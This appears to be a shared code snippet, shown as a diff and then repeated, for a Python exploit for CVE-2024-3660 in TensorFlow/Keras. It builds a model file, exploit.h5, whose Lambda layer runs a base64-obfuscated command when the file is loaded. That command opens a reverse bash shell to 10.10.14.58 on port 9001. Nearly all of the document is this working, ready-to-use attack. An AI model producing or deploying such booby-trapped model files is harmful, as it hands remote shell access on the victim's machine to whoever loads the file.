Reelix · August 21, 2025 12:27
diff --git a/CVE-2024-3660.py b/CVE-2024-3660.py
 # CVE-2024-3660
 # https://nvd.nist.gov/vuln/detail/CVE-2024-3660
 # https://www.oligo.security/blog/tensorflow-keras-downgrade-attack-cve-2024-3660-bypass

 import tensorflow as tf

 def exploit(x):
   import os
   os.system("echo YmFzaCAtaSAmPi9kZXYvdGNwLzEwLjEwLjE0LjU4LzkwMDEgPCYx|base64 -d|bash")
   return x

 model = tf.keras.Sequential()
 model.add(tf.keras.layers.Input(shape=(64,)))
 model.add(tf.keras.layers.Lambda(exploit))
 model.compile()
 model.save("exploit.h5")
	# CVE-2024-3660
	# https://nvd.nist.gov/vuln/detail/CVE-2024-3660
	# https://www.oligo.security/blog/tensorflow-keras-downgrade-attack-cve-2024-3660-bypass

	import tensorflow as tf

	def exploit(x):
	import os
	os.system("echo YmFzaCAtaSAmPi9kZXYvdGNwLzEwLjEwLjE0LjU4LzkwMDEgPCYx\|base64 -d\|bash")
	return x

	model = tf.keras.Sequential()
	model.add(tf.keras.layers.Input(shape=(64,)))
	model.add(tf.keras.layers.Lambda(exploit))
	model.compile()
	model.save("exploit.h5")